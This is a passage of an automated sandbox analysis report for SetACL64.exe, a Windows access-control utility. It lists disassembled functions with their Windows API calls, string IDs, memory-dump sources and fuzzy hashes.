                                                    • Part of subcall function 00007FF7C172B710: RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF7C172B812
                                                    • Part of subcall function 00007FF7C1709520: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1709606
                                                    • Part of subcall function 00007FF7C1709520: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C170960C
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskEnum
                                                  • String ID: SetACL finished successfully.$/$Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset.$Object path and/or object type not specified.$Prepare$Run$read
                                                  • API String ID: 1222371136-710240214
                                                  • Opcode ID: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
                                                  • Instruction ID: 8c88df4de652eab0d13b90fe2f467468cba1651b2b0dc0d4447832c139fff120
                                                  • Opcode Fuzzy Hash: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
                                                  • Instruction Fuzzy Hash: BF32A072A1968281EB14EF66E4843AAE361FB4D7A0FC04532D65D43AD7DFBCE151CB20
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Info$CloseErrorLastProcessSecurityShare$BufferCreateCurrentFileFreeHandleNamedOpenToken
                                                  • String ID: SeSecurityPrivilege
                                                  • API String ID: 4200377542-2333288578
                                                  • Opcode ID: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
                                                  • Instruction ID: b60da2fe27666989aafac9c287a29adb5f06d260074a9dfd11d876dcc11140f6
                                                  • Opcode Fuzzy Hash: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
                                                  • Instruction Fuzzy Hash: CD42A172A0878285EB10EF26D4447ADA361FB497A8FD04235DA5D47BDADFBCE580C360

                                                  Control-flow Graph
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterEventMutexReleaseSection
                                                  • String ID: %s$UNKNW,
                                                  • API String ID: 995701069-1666316639
                                                  • Opcode ID: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
                                                  • Instruction ID: 70f08c01b1d95545d0dbc03bb40ea7416394866ceae1e281ccc048534411da74
                                                  • Opcode Fuzzy Hash: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
                                                  • Instruction Fuzzy Hash: A3518E62A19A4285EF04EF56D55837DA365FB49BA4FD25434CA0E073A3DEBCE4448720

                                                  Control-flow Graph

                                                  APIs
                                                  • LookupAccountNameW.ADVAPI32 ref: 00007FF7C173F44D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF7C173E9EF), ref: 00007FF7C173F453
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF7C173E9EF), ref: 00007FF7C173F45E
                                                  • LookupAccountNameW.ADVAPI32 ref: 00007FF7C173F54D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF7C173E9EF), ref: 00007FF7C173F557
                                                  • IsValidSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF7C173E9EF), ref: 00007FF7C173F593
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C173F647
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C173F64D
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C173F653
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$AccountLookupName_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskValid
                                                  • String ID:
                                                  • API String ID: 311209037-0
                                                  • Opcode ID: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
                                                  • Instruction ID: df98df2db12b093d054b4f728fa6999c7ff6bd205a7d0b6c4252a78f598bb5ac
                                                  • Opcode Fuzzy Hash: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
                                                  • Instruction Fuzzy Hash: C9719422A18B8681EB24AF16A44436DB365FB49BF4FE40231DA5D07BD6DFBCE4508351

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterEventFileLeaveModuleNameRegisterSource
                                                  • String ID: DefaultEventSource
                                                  • API String ID: 352910984-1672983561
                                                  • Opcode ID: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
                                                  • Instruction ID: aded28a548baed820fa1c739a00e823b1fa218be891169acf6aa8f78bfef3ea0
                                                  • Opcode Fuzzy Hash: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
                                                  • Instruction Fuzzy Hash: 48A17262B14B8185EF00AF76D4453AC6361EF587ACF918235E75C06ADBDFB8E194C350

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$CloseDeregisterEventHandleSource
                                                  • String ID:
                                                  • API String ID: 1038480651-0
                                                  • Opcode ID: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
                                                  • Instruction ID: 3c1a972f1d4270da3561ff82d53050e747fb7044f8f57448eec15de7b49b70e5
                                                  • Opcode Fuzzy Hash: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
                                                  • Instruction Fuzzy Hash: 7C01ED21F08642D6FB54FF67AC98338E364BF8EB61F840135C94F46562CFACA4548720

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseEnum
                                                  • String ID:
                                                  • API String ID: 315095564-0
                                                  • Opcode ID: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
                                                  • Instruction ID: 914d9d67005cf21e7f36f1b7ca1c29b41540cfa393e1563727f1f0886c0662cc
                                                  • Opcode Fuzzy Hash: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
                                                  • Instruction Fuzzy Hash: D961C232B18B8285F710EF66E4403ADA3A5EB887A8F500135EF8C53A9ADF78D051C750

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2067211477-0
                                                  • Opcode ID: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
                                                  • Instruction ID: 24f127fc41f9e0e952d20ee55ac6bbab45dcb549bf05b64fb1eae72a1728dd7f
                                                  • Opcode Fuzzy Hash: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
                                                  • Instruction Fuzzy Hash: 60215E25B0974686FF14EF67A410179E3A0AF8CBB0F848430DE5D07756DEBCE4008B61

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CompareString$try_get_function
                                                  • String ID: CompareStringEx
                                                  • API String ID: 3689094840-2590796910
                                                  • Opcode ID: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
                                                  • Instruction ID: 4a61fa0eab4d71ecc733919939e1190e900c2ecbe9efee883d8996ec3b0dc485
                                                  • Opcode Fuzzy Hash: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
                                                  • Instruction Fuzzy Hash: E511F936608B8186D760DF56B4402AAB7A5FBCDBA0F94413AEE8D43B5ACF7CD4548B40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: DefaultUser$LocaleNametry_get_function
                                                  • String ID: GetUserDefaultLocaleName
                                                  • API String ID: 1828775994-151340334
                                                  • Opcode ID: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
                                                  • Instruction ID: edaab89b8e1d54f2bf0d7111704106c3286351ea5a666a274e763ba5ce51cc1f
                                                  • Opcode Fuzzy Hash: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
                                                  • Instruction Fuzzy Hash: B9F05E50F0894292EB55EF57B5916F89361AF4C7A0FC49035D90D07A97CFBC98898361
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 1321466686-0
                                                  • Opcode ID: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
                                                  • Instruction ID: 79b4dc62a7f7f7314968b508b68f13b425b281d7f5ae80bbd9ee7cba72664c74
                                                  • Opcode Fuzzy Hash: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
                                                  • Instruction Fuzzy Hash: 16312931A0860741FB54BF27A4553BDE3A0AF4D7A4FC44035EA4D076E7DEADE8188A71
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: *
                                                  • API String ID: 3215553584-163128923
                                                  • Opcode ID: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
                                                  • Instruction ID: 63ec8852420c5f142cbff73d3cc76e35147c7597ff9be25ffa40b62356200c5d
                                                  • Opcode Fuzzy Hash: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
                                                  • Instruction Fuzzy Hash: A371BC76948212CAF768FF2A805417CB7A4EB0DB24F941135EA4A43296DFB8EC41DF60
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AllocErrorLast
                                                  • String ID: tss
                                                  • API String ID: 4252645092-1638339373
                                                  • Opcode ID: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
                                                  • Instruction ID: a437e884cd3b6906bf2eb92525be561199a43dd96f68cdb7ed3772c85e25f88a
                                                  • Opcode Fuzzy Hash: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
                                                  • Instruction Fuzzy Hash: 93014F31E4964782EB10BF36A884078A3A0BF9D374FD00631D65D827E6DFACD5558B20
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
                                                  • Instruction ID: 7ae05e16ff28f1a7c32a972365dba21a9590ea2966c38d7b6b707dca90ec1407
                                                  • Opcode Fuzzy Hash: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
                                                  • Instruction Fuzzy Hash: C3317C32E0CA8289FB607F1694102BAA194AF5DBB0F944131EA6D066D7CEBCE4415B20
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$ERROR,
                                                  • API String ID: 3988221542-2486372128
                                                  • Opcode ID: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
                                                  • Instruction ID: b4721f46d184218e9503a37eed21f357cb2438b1e8e365182179608edb50a7ee
                                                  • Opcode Fuzzy Hash: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
                                                  • Instruction Fuzzy Hash: 7E219D61A08A8284FF14EF17D54C3B9A762AB49BA4FD25435CA0D066E7DFECD444C360
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$CRTCL,
                                                  • API String ID: 3988221542-3126492506
                                                  • Opcode ID: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
                                                  • Instruction ID: 228450d306aac999e74229b2dc48d41d79cfdc1e1e1a31bb5d5e2fc8ce1aa360
                                                  • Opcode Fuzzy Hash: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
                                                  • Instruction Fuzzy Hash: 43219D61A08A8284EF14EF17D54C3B9A762AB49BA4FD25435CA0D066E7DFECD444C360
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$WARN ,
                                                  • API String ID: 3988221542-3785767073
                                                  • Opcode ID: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
                                                  • Instruction ID: 81db650cce96e30ffddd3710b6291357cbcc35ffdd2882e3f1b672cf2b7b50b9
                                                  • Opcode Fuzzy Hash: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
                                                  • Instruction Fuzzy Hash: 0F219D61A08A8284EF14EF57D54C3B9A762AB49BA4FD25435CA0D066E7EFECD444C360
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$NONE ,
                                                  • API String ID: 3988221542-1825952341
                                                  • Opcode ID: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
                                                  • Instruction ID: d1144c11e0ce29cb90262dcb4cf4abff0b97fe317c2c22bf67a1cb50678f163d
                                                  • Opcode Fuzzy Hash: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
                                                  • Instruction Fuzzy Hash: CB219D61A0868284EF14EF17D54C3B9A762AB49BA4FD25431CA0D066E7EFECD444C360
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$DEBUG,
                                                  • API String ID: 3988221542-4222748730
                                                  • Opcode ID: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
                                                  • Instruction ID: fafa2f05d2ace5064420f4de22cdb0615c5cf6e39a802da7015be500252d9f54
                                                  • Opcode Fuzzy Hash: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
                                                  • Instruction Fuzzy Hash: 55219D61A0868284EF15EF17D54C3B9A762AB49BA4FD25431CA0D066E7EFECD444C360
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                   • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$INFO ,
                                                  • API String ID: 3988221542-2224252516
                                                  • Opcode ID: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
                                                  • Instruction ID: d3fe4062dc854d14f23944379e65fb928a522f077371a9ab48faf6590bdd7322
